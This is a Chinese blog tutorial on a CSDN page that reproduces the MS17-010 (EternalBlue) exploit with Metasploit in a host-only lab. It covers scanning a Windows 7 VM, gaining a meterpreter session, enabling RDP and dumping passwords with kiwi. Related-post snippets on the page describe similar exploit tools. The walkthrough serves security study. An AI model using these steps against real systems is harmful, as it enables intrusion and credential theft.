Metasploit使用与MS17-010复现

于 2024-04-04 18:43:52 发布
阅读量874 收藏 19
点赞数 7
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68653650/article/details/137379448
版权
本文详细描述了如何在KaliLinux上利用MS17-010漏洞对Windows7进行扫描,并通过Metasploit实现反向和正向连接,包括设置payload、验证连接和利用Kiwi工具获取密码进行远程登录。
摘要由CSDN通过智能技术生成

 一·MS17-010漏洞利用复现

注意:Metasplit实验要求靶机和Kali都必须使⽤host-only⽹络,且需要在同一个网段,(若不是同一个网段,可以手动新建编辑一个网络配置,两者都是这个网络配置)否则无法互ping。

环境:靶机:win7,攻击机:kali-linux

1.进入kali输入:sudo su,获得root权限。

输入:Ifconfig

kali的Ip地址:192.168.56.104

2.打开win7,输入:Ipconfig

Win7的ip地址:192.168.56.105

3.返回kali,输入:ping 192.168.56.105 ,查看它们的网络是否能互通。

Ping之前关闭win7防火墙

4.收集信息:nmap 192.168.56.105 -sS

显示Win7开放了135,139,445等端口,ms17-010(永恒之蓝)利用的端口就是445端口。

5.远程ssh连接Kali,启动metasploit

输入:msfconsole //启动

输入:search 17-010 搜索相关漏洞插件

这里就拿auxiliary/scanner/smb/smb_ms17_010这个扫描插件来测试,这个插件的作用是扫描可能含有 ms17-010 漏洞的服务器

输入:show options

yes表示是你必须要填写的一些信息。这里缺少rhosts,也就是你要攻击的目标IP地址

输入:set rhosts 192.168.56.105

结果显示发现漏洞!

二·攻击机(Kali)与靶机建立的连接为正向还是反向连接? 找到一种方法验证你的推断。

连接方式:反向连接

验证方法:利用模块0,对目标机(192.168.56.105)进行攻击,模块0的利用方式步骤和模块24相同。在使用该模块时,可以设置连接方式,默认连接方式是反向连接(即payload为/windows/x64/meterpreter/reverse_tcp),如果想切换成正向连接,就要执行命令,之后的结果和步骤都和反向连接时相同

输入:set payload /windows/x64/meterpreter/bind_tcp #设置成正向连接

运行结果,获取到一个会话(meterpreter),相当于已经在攻击机和靶机之间建立了一个通道

输入:netstat -ano 查看目标机端口,看3389是否打开,若没有打开需要执行命令开启3389 :run post/windows/manage/enable_rdp

重新开启一个终端,输入:rdesktop 192.168.56.105

输入:yes 连接成功!

由于远程登陆还需要抓取密码

输入:load kiwi  #加载抓取密码的工具

输入:creds_all #列出所有用户名和密码

输入用户名和密码,在kali远程登陆靶机桌面。

成功!

man不经心
关注
  • 7
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
AutoBlue-MS17-010:这是半自动的,完全正常工作,no-bs,非metasploit版本的MS17-010公共漏洞利用代码
02-06
MS17-010利用代码这是一些no-bs公共漏洞利用代码,可以为永恒的蓝色漏洞利用生成有效的shellcode,并使用metasploit多处理程序编写事件侦听器的脚本。 此版本的漏洞利用程序以无需使用metasploit即可利用永恒蓝色的...
MS17-010:MS17-010 Poc Shell 调用Nmap and Metasploit 内网445测试的一款Poc
05-18
永恒之蓝 MS17-010 Scan and Exploit Shell Usage MAC OSX git clone https://github.com/xaiJoker/MS17-010/ cd ms17-010 && chmod +x ms17-010.sh sh ms17-010.sh Linux git clone ...
渗透测试--MS17-010(永恒之蓝)漏洞
jxy158212的博客
08-08 551
nmap是目前最流行的网络扫描工具,不仅能准确探测单台主机的详细情况,而且能高效地对大范围的Ip地址段扫描。能扫描目标网络上有哪些主机上存活的,哪些服务是开放的,甚至知道网络中使用了何种类型的防火墙设备等。常见指令-sT:TCP connect扫描-sF/-sX/-sN:通过发送一些特殊的标志位以避开设备或软件的检测-sP:通过发送ICMP echo请求探测主机是否存活,原理同Ping-sU:探测目标主机开放了哪些UDP端口-sA:TCP ACK扫描,对防火墙上未屏蔽的端口进行探测。
Metasploitable渗透测试:ms17-010
sc_1999的博客
11-27 851
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
Zichel77的博客
10-06 2491
发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用。这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本。Windows下IP地址为192.168.92.136。就可以看到windows7电脑中新建了这么个文件。看到WIN才说明利用成功,FAIL就是失败。使用的是nmap模块,输入命令进行扫描。开启了两台虚拟机,保证在同一网段下。两台虚拟机在同一网段,故可保持通信。我没这个病毒就不传了哈哈哈哈哈。
kali初讲——Metasploit攻击ms17_010复现
萌蠢骇客
06-14 1688
Kali初讲——ms17_010漏洞,永恒之蓝复现
Metasploit(一) 利用 MS17-010 漏洞进行攻击
buffedon的博客
06-03 5702
借助 metasploit 利用 MS17-010 漏洞进行攻击Metasploit 简介 (简称:MSF)经常被利用的端口MS17-010利用流程1. 存活判断2. 端口扫描3. 服务识别4. 系统识别5. 漏洞利用后渗透阶段基础命令POST后渗透模块访问文件系统权限提升获取密码的方式run windows/gather/credentials/windows_autologinhashdump 模块mimikatz程序加载kiwi模块MSF中的 mimikatz 模块 Metasploit 简介 (简称
使用metasploit攻击实例讲解1-ms10-046快捷方式图标漏洞
最新发布
12-29
3. **选择模块**:在Metasploit中,你可以通过`msfconsole`命令启动控制台,然后使用`search`命令查找针对ms10-046的模块。找到合适的模块后,加载该模块,如`use exploit/windows/local/ms10_046_lnk`。 4. **配置...
Windows漏洞 MS17-010 / EternalBlue(永恒之蓝)工具-易语言
06-11
MS17-010 / EternalBlue(永恒之蓝) 漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之蓝 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 ...
网络安全-实验三ms17-010漏洞利用.docx
11-10
6. 利用`search`命令在Metasploit中查找与MS17-010相关的模块。 7. 选择合适的模块,例如编号为0的模块,或者使用全名来指定。 8. 设置攻击目标的IP地址,使用`set rhosts`命令。 9. 设置攻击者的IP地址,使用`set ...
MS17-010 漏洞永恒之蓝445漏洞复现
qq_46400462的博客
05-01 1047
前言 这里使用kali中的Metasploit 主要利用445端口的漏洞 首先需要一台win7作为目标靶机 (不只是win7可以) 启用Metasploit mfsconsole 1.查找漏洞模块 search MS17-010 查找MS17-010漏洞 2.使用anxiliary模块的scanner use 3 使用anxiliary模块的scanner扫描目标是否存在MS17-010漏洞 3.查看模块相关参数 show options 其中required为yes的为必要的参数 4.设置目标主机 .
ms17-010(永恒之蓝) 漏洞复现与处理
热门推荐
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
Metasploitable渗透测试实战:ms17-010
m0_60121089的博客
05-04 1819
目录 1.漏洞描述 2.Metasploitable渗透测试 3.扩展 1.漏洞描述 Microsoft Windows SMB Server远程代码执行漏洞。 Microsoft Server Message Block 1. 0 (SMBv1) 服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败,会导致拒绝服务,对业务造成一定安全风险。 漏洞影响:Microsoft Windows Server 2016、 Mi
msf复现永恒之蓝漏洞ms17-010(详解)
m0_72125469的博客
05-18 1411
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
利用kali Linux 渗透windows 操作系统
YJlio的博客
03-05 7467
利用kali Linux 渗透windows 操作系统 一、实验目的:使用kali生成木马,渗透windows系统 二、实验内容: 使用kali中的Metasploit生成木马,控制windows系统 三、实验环境 需要从VMware Workstation 中创建两台虚拟机 一台kali linux和一台靶机windows系统 1、攻击者ip(kali) 192.168.63.21 2、靶机ip(windows)192.168.63.20 四、实验步骤 先将虚拟机的网络模式修改为桥接模
【网络安全】通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
qq_68643282的博客
03-12 2268
通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3844
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
Kali Linux远程登录
程三万的博客
09-22 1111
Active:active(running)为打开状态。
如何使用metasploit利用ms17-010漏洞对模拟靶机进行攻击
06-09
MS17-010漏洞是指Windows SMB远程代码执行漏洞,可以通过Metasploit利用这个漏洞对目标系统进行攻击。下面是攻击步骤: 1. 打开Metasploit控制台,输入`msfconsole`命令启动。 2. 搜索MS17-010漏洞模块,输入命令`search ms17-010`。 3. 选择对应的漏洞模块,输入命令`use exploit/windows/smb/ms17_010_eternalblue`。 4. 设置目标IP地址,输入命令`set RHOSTS <目标IP地址>`。 5. 设置攻击机监听的IP地址和端口号,输入命令`set LHOST <攻击机IP地址>`和`set LPORT <监听端口号>`。 6. 运行漏洞模块,输入命令`exploit`。 7. 如果攻击成功,将会创建一个会话,可以通过命令`sessions`查看当前会话列表。 8. 输入命令`sessions -i <会话ID>`进入会话,这样就可以执行一些命令,例如`sysinfo`查看目标系统信息,`shell`获取一个交互式shell等。 需要注意的是,这是一种非常危险的行为,必须在合法的环境下使用,否则可能会对他人和自己造成严重的损失。建议在使用前仔细阅读Metasploit的文档和指南,并遵守相关法律法规。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值